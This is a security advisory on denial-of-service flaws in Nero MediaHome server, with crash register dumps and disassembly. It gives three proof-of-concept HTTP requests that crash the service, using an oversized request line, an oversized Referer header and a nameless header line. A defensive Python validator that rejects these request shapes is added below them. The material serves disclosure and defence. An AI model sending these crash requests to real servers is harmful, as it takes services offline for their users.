Nero MediaHome Multiple Remote DoS Vulnerabilities

High-Tech Bridge Security Research Lab, advisory HTB23130
Published: 2012-11-21
www.htbridge.com

CVSS2 base score: 5 (Medium)
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P (Access Vector: Network; Access Complexity: Low; Authentication: None; Confidentiality Impact: None; Integrity Impact: None; Availability Impact: Partial)
EPSS: 0.067 (Low), percentile 93.1%

High-Tech Bridge Security Research Lab has discovered multiple DoS vulnerabilities in Nero MediaHome server, which could be exploited by a malicious person to crash the server remotely.

  1. Off-by-one errors in Nero MediaHome server: CVE-2012-5876
    1.1 The vulnerability exists due to an off-by-one error in NMMediaServerService.dll when handling HTTP requests with overly long request lines. A remote attacker can send multiple HTTP requests with a request line at least 135 168 characters long to port 54444/TCP (Nero MediaHome server's default port) and cause an immediate crash of Nero MediaHome server.
    Crash details:
    EIP: 7c921689 mov ecx,[ecx]
    EAX: 03b2a808 ( 62040072) -> (heap)
    EBX: 003e0000 ( 4063232) -> b@>@>" (heap)
    ECX: 00000000 ( 0) -> N/A
    EDX: 00000000 ( 0) -> N/A
    EDI: 03b2b000 ( 62042112) -> D (heap)
    ESI: 03b2a800 ( 62040064) -> (heap)
    EBP: 0526f854 ( 86440020) -> &|&B>>D&$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>.D. (stack)
    ESP: 0526f848 ( 86440008) -> >">&|&B>>D&$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>. (stack)
    +00: 003e0000 ( 4063232) -> b@>@>" (heap)
    +04: 00000022 ( 34) -> N/A
    +08: 003e0004 ( 4063236) -> b@>@>" (heap)
    +0c: 0526f88c ( 86440076) -> &$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>.D. D&|>|>|h& (stack)
    +10: 7c928ccd (2089979085) -> N/A
    +14: 00000000 ( 0) -> N/A
    Disasm around:
    0x7c921664 mov ecx,[ebp+0x10]
    0x7c921667 add eax,[ecx]
    0x7c921669 cmp eax,0xfe00
    0x7c92166e ja 0x7c920721
    0x7c921674 cmp byte [ebp+0x14],0x0
    0x7c921678 jnz 0x7c95ae10
    0x7c92167e mov ecx,[esi+0xc]
    0x7c921681 lea eax,[esi+0x8]
    0x7c921684 mov edx,[eax]
    0x7c921686 mov [ebp+0x8],ecx
    0x7c921689 mov ecx,[ecx]
    0x7c92168b cmp ecx,[edx+0x4]
    0x7c92168e mov [ebp+0xc],edx
    0x7c921691 jnz 0x7c921734
    0x7c921697 cmp ecx,eax
    0x7c921699 jnz 0x7c921734
    0x7c92169f push esi
    0x7c9216a0 push ebx
    0x7c9216a1 call 0x7c920684
    0x7c9216a6 mov eax,[ebp+0xc]
    0x7c9216a9 mov ecx,[ebp+0x8]
    Proof of Concept:
    The following HTTP request, sent a number of times, will crash the vulnerable Nero MediaHome server:
    GET /[A * 135168 or more] HTTP/1.1
    HOST: somehost.com
    ACCEPT: /
    Accept-Encoding: None
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Connection: Close
    Accept-Transfer-Encoding: None

    1.2 The vulnerability exists due to insufficient validation of HTTP request header values in NMMediaServer.dll. A remote attacker can send a specially crafted HTTP request containing an overly long header value (at least 135 168 characters long) to port 54444/TCP, cause a heap-based buffer overflow and crash the vulnerable application.
    Crash details:
    EIP: 7c920a19 mov ecx,[ecx]
    EAX: 03c3c008 ( 63160328) -> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)
    EBX: 003e0000 ( 4063232) -> Tp@>+ (heap)
    ECX: 41414141 (1094795585) -> N/A
    EDX: 41414141 (1094795585) -> N/A
    EDI: 03c1af88 ( 63025032) -> B>VTP/1.1Host localhostUser-Agent Mozilla/5.0 (Windows; U)Accept-Language en-us,en;q=0.5Keep-AliB (heap)
    ESI: 03c3c000 ( 63160320) -> BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)
    EBP: 0527f828 ( 86505512) -> ' (stack)
    ESP: 0527f81c ( 86505500) -> >!>'|VAAAAT'A>>B'$|>pgg|' |(|"|||>"|>><'' |(|"||x>'><' | (stack)
    +00: 003e0000 ( 4063232) -> Tp@>+ (heap)
    +04: 00000021 ( 33) -> N/A
    +08: 003e0004 ( 4063236) -> Tp@>+ (heap)
    +0c: 0527f860 ( 86505568) -> '$|>pgg|' |(|"|||>"|>><'' |(|"||x>'><' |>@'X4' || (stack)
    +10: 7c928ccd (2089979085) -> N/A
    +14: 03ad5600 ( 61691392) -> >8*W=>@ 3:X`DS.MetaData.OriginalStreamNumber0[Jp (heap)
    Disasm around:
    0x7c9209f8 jnz 0x7c95af5f
    0x7c9209fe mov al,[esi+0x5]
    0x7c920a01 and al,0x10
    0x7c920a03 test al,0x10
    0x7c920a05 mov [edi+0x5],al
    0x7c920a08 jnz 0x7c920aa0
    0x7c920a0e mov ecx,[esi+0xc]
    0x7c920a11 lea eax,[esi+0x8]
    0x7c920a14 mov edx,[eax]
    0x7c920a16 mov [ebp+0xc],ecx
    0x7c920a19 mov ecx,[ecx]
    0x7c920a1b cmp ecx,[edx+0x4]
    0x7c920a1e mov [ebp+0x14],edx
    0x7c920a21 jnz 0x7c921752
    0x7c920a27 cmp ecx,eax
    0x7c920a29 jnz 0x7c921752
    0x7c920a2f push esi
    0x7c920a30 push ebx
    0x7c920a31 call 0x7c920684
    0x7c920a36 mov eax,[ebp+0x14]
    0x7c920a39 mov ecx,[ebp+0xc]
    Proof of Concept:
    The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
    GET / HTTP/1.1
    Host somehost.com
    User-Agent: Mozilla/5.0 (Windows; U)
    Accept-Language: en-us,en;q=0.5
    Keep-Alive: 300
    Connection: keep-alive
    Referer:[A * 265566]

  2. NULL pointer dereference in Nero MediaHome server: CVE-2012-5877
    2.1 The vulnerability exists due to a NULL pointer dereference error when handling an HTTP request with a missing HTTP header name. A remote attacker can send a specially crafted HTTP request with a missing HTTP header name and crash Nero MediaHome server.
    Crash details:
    EIP: 10003171 mov [eax+0x18],ebp
    EAX: 00000000 ( 0) -> N/A
    EBX: 037bd090 ( 58445968) -> x4xx @R px?x? (heap)
    ECX: 039cddea ( 60612074) -> localhost (heap)
    EDX: 039cddea ( 60612074) -> localhost (heap)
    EDI: 037bc888 ( 58443912) -> ||{sP@OQ6E}{AY+ (heap)
    ESI: 037c7fb0 ( 58490800) -> ?|?LPCMH|faudio/l16a| ||MP3| (heap)
    EBP: 00000009 ( 9) -> N/A
    ESP: 0563fad0 ( 90438352) -> {s|~{x`)huc1P3quhucuthucuyuuhuhucuuM|$cVhx (stack)
    +00: 037bd090 ( 58445968) -> x4xx @R px?x? (heap)
    +04: 039cdde8 ( 60612072) -> localhostUser-Agent: Mozilla/5.0 (Windows; U)Accept-Language: en-us,en;q=0.5Keep-Alive: 300Connection: keep-aliveReferer: http://www.htbridge.ch (heap)
    +08: 00000000 ( 0) -> N/A
    +0c: 00000001 ( 1) -> N/A
    +10: 000000b8 ( 184) -> N/A
    +14: 037c7318 ( 58487576) -> hhuA_ARG_TYPE_Result7$*pb$ (heap)
    Disasm around:
    0x10003156 mov edx,[esi+0x8]
    0x10003159 mov ebp,[esi+0xc]
    0x1000315c push byte 0x1
    0x1000315e push eax
    0x1000315f push ecx
    0x10003160 push ebx
    0x10003161 mov [edi+0x40],esi
    0x10003164 mov [esp+0x2c],edx
    0x10003168 call 0x10002730
    0x1000316d mov ecx,[esp+0x2c]
    0x10003171 mov [eax+0x18],ebp
    0x10003174 mov ebp,[esp+0x24]
    0x10003178 add esp,0x10
    0x1000317b mov [eax+0x14],ecx
    0x1000317e mov edx,[ebp+0x8]
    0x10003181 test edx,edx
    0x10003183 mov [esp+0x14],edx
    0x10003187 jnz 0x10002ff0
    0x1000318d mov eax,[esp+0x24]
    0x10003191 push eax
    0x10003192 call 0x10002c20
    Proof of Concept:
    The following HTTP request will crash Nero MediaHome server remotely:
    GET / HTTP/1.1
    : somehost.com
    User-Agent: Mozilla/5.0 (Windows; U)
    Accept-Language: en-us,en;q=0.5
    Keep-Alive: 300
    Connection: keep-alive
    Referer: http://www.host.com
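All three crashes above share one root cause: the request parser copies a request line, a header value, or a header name into memory without first bounding its length or checking that the field is present. The validator below is an added example written for this page, not High-Tech Bridge's or Nero's code; it shows the checks a hardened HTTP/1.x parser applies before touching any field, and exercises them against constructed requests shaped like the three proofs of concept (the size limits, the helper names and the sample requests are assumptions chosen for the example, with Apache httpd's 8190-byte default field limit used as a reference point).

```python
"""Defensive HTTP request-head validator (added example, not advisory code).

Applies the three sanity checks whose absence produced the crashes in
HTB23130: a bounded request line, bounded header values, and a non-empty
header name on every header line. Every sample request is constructed here.
"""
from dataclasses import dataclass
from typing import Optional

# Assumed limits for this example; Apache httpd's default of 8190 bytes for
# the request line and for each header field is a common reference point.
MAX_REQUEST_LINE = 8190
MAX_HEADER_VALUE = 8190
MAX_HEADERS = 100
CRLF = b"\r\n"


@dataclass
class Verdict:
    ok: bool
    reason: Optional[str]
    method: Optional[bytes] = None
    target: Optional[bytes] = None
    headers: Optional[dict] = None


def validate_request_head(raw: bytes) -> Verdict:
    """Parse the head of an HTTP/1.x request and reject malformed or
    oversized input before any field is copied into a fixed-size buffer."""
    head, sep, _body = raw.partition(CRLF + CRLF)
    if not sep:
        return Verdict(False, "incomplete head")
    lines = head.split(CRLF)
    request_line = lines[0]
    # Check 1 (1.1): bound the request line before parsing it.
    if len(request_line) > MAX_REQUEST_LINE:
        return Verdict(False, f"request line too long ({len(request_line)} bytes)")
    parts = request_line.split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/1."):
        return Verdict(False, "malformed request line")
    method, target, _version = parts
    headers = {}
    for line in lines[1:]:
        if len(headers) >= MAX_HEADERS:
            return Verdict(False, "too many headers")
        name, colon, value = line.partition(b":")
        # Check 3 (2.1): a header line must carry a name, ": value" is rejected.
        if not colon or not name.strip():
            return Verdict(False, "empty or missing header name")
        name = name.strip()
        value = value.strip()
        # Check 2 (1.2): bound each header value, e.g. an oversized Referer.
        if len(value) > MAX_HEADER_VALUE:
            label = name.decode(errors="replace")
            return Verdict(False, f"header {label} value too long ({len(value)} bytes)")
        headers[name.lower()] = value
    return Verdict(True, None, method, target, headers)


def build_request(target: bytes, headers: list) -> bytes:
    """Assemble a raw request head from a target and (name, value) pairs;
    a name of b"" produces the missing-name line from PoC 2.1."""
    lines = [b"GET " + target + b" HTTP/1.1"]
    for name, value in headers:
        lines.append(name + b": " + value)
    return CRLF.join(lines) + CRLF + CRLF


# Constructed samples shaped like the advisory's proofs of concept.
SAMPLES = {
    "benign": build_request(b"/", [(b"Host", b"somehost.com"), (b"Connection", b"close")]),
    "long_request_line": build_request(b"/" + b"A" * 135168, [(b"Host", b"somehost.com")]),
    "long_header_value": build_request(b"/", [(b"Host", b"somehost.com"), (b"Referer", b"A" * 135168)]),
    "missing_header_name": build_request(b"/", [(b"", b"somehost.com"), (b"User-Agent", b"Mozilla/5.0")]),
}


def triage(samples: dict = SAMPLES) -> dict:
    """Map each sample label to the rejection reason (None when accepted)."""
    return {label: validate_request_head(raw).reason for label, raw in samples.items()}


if __name__ == "__main__":
    for label, reason in triage().items():
        print(f"{label:22s} -> {reason or 'accepted'}")
```

The same three checks make a useful detection signature at a reverse proxy or IDS in front of a DLNA/UPnP server: request lines or header values of six figures in length, and header lines beginning with a colon, have no legitimate use and are exactly the shapes the advisory's proofs of concept take.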
Affected products (CPE; "le" means less than or equal to):
Name            Operator  Version
nero mediahome  le        4.5.8.0
